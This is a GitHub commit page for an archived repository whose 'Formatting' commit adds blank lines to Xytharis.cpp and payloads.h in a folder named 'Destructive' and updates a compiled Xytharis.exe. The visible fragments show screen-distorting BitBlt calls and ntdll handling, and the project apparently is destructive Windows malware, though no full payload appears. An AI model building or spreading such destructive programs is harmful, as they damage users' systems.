Skip to content
This repository has been archived by the owner on Aug 14, 2023. It is now read-only.

Commit

Permalink
Formatting
Browse files Browse the repository at this point in the history
  • Loading branch information
kevlu8 committed Oct 2, 2021
1 parent bf88aef commit e5145c1
Show file tree
Hide file tree
Showing 12 changed files with 3 additions and 0 deletions.
Binary file modified Destructive/Code/.vs/Xytharis/v16/.suo
Binary file not shown.
Binary file modified Destructive/Code/.vs/Xytharis/v16/Browse.VC.db
Binary file not shown.
Binary file not shown.
Binary file modified Destructive/Code/XytharisFixed/Debug/Xytharis.ilk
Binary file not shown.
Binary file modified Destructive/Code/XytharisFixed/Debug/Xytharis.obj
Binary file not shown.
Binary file not shown.
Binary file modified Destructive/Code/XytharisFixed/Debug/vc142.idb
Binary file not shown.
Binary file modified Destructive/Code/XytharisFixed/Debug/vc142.pdb
Binary file not shown.
2 changes: 2 additions & 0 deletions Destructive/Code/XytharisFixed/Xytharis.cpp
Original file line number Diff line number Diff line change
Expand Up @@ -178,6 +178,7 @@ INT WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpStr, IN
for (INT i = 1; i < 1000; i += 5) {
BitBlt(desk, sin(i) * 5, cos(i) * i, sw, h, desk, rand() % i * 50, rand() % i * 50, SRCCOPY);
}

ReleaseDC(NULL, desk);
CloseHandle(hmsg1);
CloseHandle(hmsg2);
Expand All @@ -195,3 +196,4 @@ INT WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpStr, IN
FreeLibrary(ntdll);
return 0;
}

1 change: 1 addition & 0 deletions Destructive/Code/XytharisFixed/payloads.h
Original file line number Diff line number Diff line change
Expand Up @@ -77,4 +77,5 @@ int p3() {
}

return 0;

}
Binary file modified Destructive/Xytharis.exe
Binary file not shown.
Binary file modified Destructive/Xytharis.pdb
Binary file not shown.

0 comments on commit e5145c1

Please sign in to comment.